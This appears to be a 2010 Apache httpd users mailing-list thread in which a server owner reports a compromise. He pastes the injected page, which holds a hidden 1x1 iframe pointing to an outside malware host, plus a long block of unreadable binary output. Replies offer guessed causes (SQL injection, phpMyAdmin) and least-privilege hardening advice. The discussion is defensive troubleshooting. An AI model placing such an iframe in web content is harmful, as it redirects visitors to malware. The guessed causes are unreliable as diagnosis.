Dan, Thanks for the advice! I will note that. Oleg. 2010/4/5 <dan_mit...@ymp.gov>
> > Oleg, > > Some other things to check/do if you don't already know this... > > Be sure that the httpd process runs as a completely unprivileged user with > nothing but read access to ANYTHING. > Be sure that the content of your site is not owned by the same user as the > httpd user. Read only access should be through group, other or acl. > Be sure that the apache config files, libraries, binaries, etc. are owned > by as different user then the httpd process user. Read and Execute access > should be through group, other or acl. > > Same goes for MySQL and any other processes running on the machines. The > running processes should NOT have write access to their own config files. > > Try to think about the problem form the running processes perspective, if I > was the httpd/mysql/etc. process, what can I hurt? Get that to a minimum. > > If there is a buffer overflow problem somewhere, you might not be able to > prevent the in memory running process from being hacked, but as long as they > can't hack the files on the server(s), a quick stop/start or reboot should > fix the problem. > > Good Luck! > > Dan > > > Please respond to users@httpd.apache.org > > To: users@httpd.apache.org > cc: (bcc: Dan Mitton/YD/RWDOE) > Subject: Re: [us...@httpd] Someone hacked my apache2 server > > LSN: Not Relevant > User Filed as: Not a Record > > Oh, ok. I got it. I have already disabled it (actually, immediately after > the attack). > Thanks for the advice. I appreciate! > Oleg. > > On Sun, Apr 4, 2010 at 5:52 PM, Daniel Reinhardt <*crypto...@cryptodan.net > * <crypto...@cryptodan.net>> wrote: > > -------------------------------------------------- > From: "Oleg Goryunov" <*oleg.goryu...@gmail.com* <oleg.goryu...@gmail.com> > > > Sent: 04 April, 2010 13:39 > > To: <*us...@httpd.apache.org* <users@httpd.apache.org>> > Subject: Re: [us...@httpd] Someone hacked my apache2 server > > > Yes, there is a MySQL server. And actually, I noticed that - while the > server was returning the mentioned hacked page, mysql process was on top of > the list of the "top" command. Though, it took only 1.5% of the CPU. > But, mysql is restricted to accept connections from outside world. It only > listens on local socket. > What kind of vulnarability does mysql have? Do you know where I can read > about it? > Oleg. > > On Sun, Apr 4, 2010 at 4:55 PM, Daniel Reinhardt <*crypto...@cryptodan.net > * <crypto...@cryptodan.net>>wrote: > > > -------------------------------------------------- > From: "Oleg Goryunov" <*oleg.goryu...@gmail.com* <oleg.goryu...@gmail.com> > > > Sent: 03 April, 2010 21:03 > To: <*us...@httpd.apache.org* <users@httpd.apache.org>> > Subject: [us...@httpd] Someone hacked my apache2 server > > Hello all, > It looks like someone hacked my apache2 server and I am trying to > understand > how this could have happened. > This is what happened: > All of a sudden the server - in response to a web-browser request for a > page > - started to give a full screen of unknown characters (looked like a long > text with encoding mismatch). > The output was immediate and the same for all the web-sites located on the > server. > Looking at the page source of the output I see the following: > ========= > > <iframe src= > *http://azsxde55.9966.org:8800/ak47/29.html*<http://azsxde55.9966.org:8800/ak47/29.html>width=1 > height=1></iframe> Л ������ э[сn█8 ■▌�√ \-░{ ╘Ц '█&q ┤I > щ]╙ф╥l{√ла$┌fCС*I┘ёс цЮхЮьf(╩Ц 9N▓-о╗pА─ 9№f8Ь З╩Ё√Уєул▀.^СЙM > ╣°їхЫ╫╟$шДсЗ┴q Ю\ЭР Ю^Э╜!¤nП\i* > > ╖\I*┬Ё╒█А k│¤0Ь═f▌┘алЇ8╝║ o лПГ¤╫ОнМь&6 ОЖО▀M*д9lAщяээ ГГгн√╙"╤╛аr| > 0┘ G й= г╔╤ !├И F&ЪН РТ═║TP═НаСщ╞* > MЮeJ█n ║Б)│ФрР √Ьєщa +iЩ┤ ;�...@№╙a`┘Н > qр Й'T f s;ъ<псhЪ▓...@лhys ╦e┬nЮТС B═Z \│∙Lщд:фУRйаO╔▀▄g╦ ╦ни╩ўю╫ЛЛє╦л > JЪ█Й╥ ╥ I╩%7░К █o > > HШЙ5╧p}+г > I╛' b'М$sах1A}RAШ s╔ ХI9АдT╥1KёлЩ ╦╥ Nc&ЩЧт Я~w xЭgLТw*╫1#╟ ∙lБ\B:e y > ├т ; Ч╫▐,B ! ╘2 .═" ╤) ╓]° ═��...@y6╬-┴ЎАа └ > ж└1╝щ m ╙BIЮ└Щ╟':�...@МОБg╩ N├b■с' жJYеДщ~2р4aA№h┤Ш║EjАm │.&cчВЩ cАqЧ > bSyь┬SPХ─=├д R├ пD▌ ЖЕ o > > #Х╠Б═╔ыў$ ╘@|H)ЧA╜)7LЯ1Щг9@/╙╨ d8R:%4F}А,L6Ь МnвТ├ S $.мO(0┌Аph╞╤ > \Є╤l№ 4#·У'C.3┤ аMU"╞Є#КБ8╒9Х╚╦>ПхFGъ& T╪j┐с ·~ > FZ∙d�0KJ.ю bE╔йь╜┼g ь8.╟нтг┴г╥ ┤щ9MxТ0YЄYЎ▐т4е" К93Ю╫ез%gмdЗ ii(░8 > Н3%┴ГCTE кЖx─t╫o H щ█Ж!- Ф^ A┘#А╕ tI9kЗ▒UN║m~╩З;? Аv \╚ > ╟8K═їbФ7а5C4│╣^▓z3x█ПO_Nc∙ПЬЮ^┌шd╧№ЎaW^|xЯп┼ВяI2`╜╜┴nowў┘(┌┘▐щя$╔^ э > ╢√╔ВK бЖ!┌╣є8Ёз║WYХбS ┼Ё█я ▀pеqз ЄtьГPлЫє0ъО∙ha :"V сг╞i ╖Z@ > Yў■ЕY,Р`- FE4Юa. ё Жv0и Ї ^ЎdTуц┬A╬>t╨╡┘ ЩМ╩г╙є│W }ё+▓ fUXЗўs -wвR > F░∙Н╕5▐d ░Ч╛▒ > > > ~ ёY вТ аY tlkачоЭ`√-▄ ┼mсЁ╠ .█ ╣н┌Г■{ х?ъ > uю4d═┤JЄ╕.т╒щ+rqy~Єыё╒▌║▄m ╣Ь* 35ez╩a▒крпх{ь#eч:х>_┴Гъx 1°/л1xQщ╕ > ╝вУжEФ,".`н╞г\║нмa E'YЇоЫ╚▐ > .Zх А:эl.Л▐{│┘юн`уRЭ ─Ь °K╩t╠йш$hH │╖║ -д╚Ъ,i╔ТvЭ ¤╡"H пч¤Ў№° > L╖W0Нsc┴ u R%ъ4╪Yf├5╬╟ЮТ,(+yє:ЎГ ь%│░щ]wR%1ё┬Е.r╞ ы╖ YR∙<} █ ю О╕д╥-q > ╖_╩╬{2Yхц╕╔ ┴┤щрБA+Q╖▄▓Ч°▐{З╗чП > > wШA┼╣╓ю4Rўs╠Fз╠╣{╙ k╔йч░8╛▄ ■╢ЫБ├#ЕнБя№~ o╗╣ЫФа &28 > ^...@o}у:╨f -AпеЪ ЦМ Ю┘k╚ пЎ▄{щ·╜/╖UїЫq$aйк╔xЄъь|═ 5 1▄ И Яєцц| ─w▄oя > 4унc�╟?╞dLM#гx╖l┐┐J╖┐аJЫa > ╙v*чї8x~vётэow+v╨\ П ╥dJ! │·╠_,Ъ╫Шъа ╚KрФ Г ь*ъY╤╢ > r┼м1С4Н8<╗kaЁ█CЄїЧП═╫гGцы╤▌∙·"O Ч╤ │ї R_√YР.& | ПжtXОH°┤╤¤ЖНАD▄┘Й ю╕r > ¤ > > KV$Ч ╙ШлWН'8z▒Р█ Жk╛YEx├хupDBRгИ4гIмє42p$╢У ЭГ ї¤f╦ > Ж ?> ы'ci > в╫i�ЙйМaщ ~ЖV ТMЁ0╩╟╥┘ **єA╞ У░ #mgDS.ц√ vо 2бзX"Ь╥ГаN +бЇ>∙бч~ И;ўL > Oь>Сp╚етА8<мГьУ■ ╗ Мяnё|<╨д_У█w?╧ь:Y ∙l-Л иSF╡Ш fa,VWэДZWА¤ЬГ.эЬ°]Х > ▄щсМ├ > > би╝9сй+╬B A& ╔-ЧnдUX▒uu вF В )Odф > с b6Щ ХkByКПV!╔Ф'╠!D░UСLA ─Х/%Аїч(d╠║Лx6щ;ЭЧкHй s╣OznЖ├HУЁш ╪┤L > SАД( │Б*D.GF* <http://d.gf/> <*http://d.gf/* <http://d.gf/>>Ц╟╫мм&╗Z3NvJ╣p > шh╖w┬] ╦ > > С▌┴№┐ iяяАm 4─7шbеzq║hКФЕ┤╜N&└- > > *X;TуМСDэ{.╣X╟жКY╓р nbgl╦═E│$S У═Зр q K#К3Fб:╚·1 З ёqо]П█rА n:▀А╨ > Ы╔Е;Лz╦0╕╩5С╤Д╤R╜ Ыr > > ┐Яyy4│ ┬>╚ЁН)╟{ЕЩ(х4╘╨ х ■ У |Їy8°y╖zЇ...@$d s№▒йb▒ж1Гпс│╦АPq_∙Ун8q ╒j > ╒╢B║ ╡ь< ╪э*ЫГБe ЕkT|└э -Ў�┴Z ╝╫╠▄= 4═q├...@Ё╘ └Ю"ЛН┼LxЦA╪е╞н цмВY > ёJф╢ЪЇ╓ ▒╥с╛°мщЄц╥╗>nG~CH(d"╒ГcЛР夹a ▓▐ 69╖ АoX;wц ыlэ╡s YИLШ@ > ╗ √C Zь р"°ЄБPcЧa)gУeхд4NH┐ /═!cСДеР┤ й╔гФCъ .9+єЫ┐╪ ф5X р > 6<ч▒┼�Ъ$╨т╥▒ИСЄ╥ №u╞aМtЄХ^ЁW?Kў╖2 ймУр╓4Р E > > ================== > The address indicated in the begining of the page code leads to some > chinese > server. > So, somehow it happened that the output of the apache server was > substituted > by this page, which redirected visitors to some chinese server. > > But the most strange thing was that the problem dissapeared itself! So, it > last for 10 minutes then disappeared! And the again started and again > dissapeared. Finally, I turned down apache untill I understand what is > going > on... > > Any idea how could that happen? How to reproduce this? How to prevent? > Where to look for logs? I have check both ssh logs and apache logs, there > is > nothing that could seem unusual there... > > Any help is appreciated. > Oleg. > > > Oleg, > > Are you running any sort of MySQL Database on this machine, and if so is it > patched and fully updated along with any php scripts. What you are showing > us is indicative of a SQL Injection Attack. > > Shocked no one has mentioned especially with the rampant incline of the > Russian Business Network to spread its malware through the use of SQL > Injection on any vulnerable website. > > Thanks, > Daniel > > --------------------------------------------------------------------- > The official User-To-User support forum of the Apache HTTP Server Project. > See > <URL:*http://httpd.apache.org/userslist.html*<http://httpd.apache.org/userslist.html>> > for more info. > To unsubscribe, e-mail: > *users-unsubscr...@httpd.apache.org*<users-unsubscr...@httpd.apache.org> > " from the digest: > *users-digest-unsubscr...@httpd.apache.org*<users-digest-unsubscr...@httpd.apache.org> > For additional commands, e-mail: > *users-h...@httpd.apache.org*<users-h...@httpd.apache.org> > > > > > Oleg, > > Its not a vulnerability with MySQL it is a vulnerable PHP Script such as an > outdated PHPMyAdmin or PHPMyAdmin itself. I hardly run it on my servers. I > would promptly disable it. > > > Thanks, > Daniel > > --------------------------------------------------------------------- > The official User-To-User support forum of the Apache HTTP Server Project. > See > <URL:*http://httpd.apache.org/userslist.html*<http://httpd.apache.org/userslist.html>> > for more info. > To unsubscribe, e-mail: > *users-unsubscr...@httpd.apache.org*<users-unsubscr...@httpd.apache.org> > " from the digest: > *users-digest-unsubscr...@httpd.apache.org*<users-digest-unsubscr...@httpd.apache.org> > For additional commands, e-mail: > *users-h...@httpd.apache.org*<users-h...@httpd.apache.org> > > > >
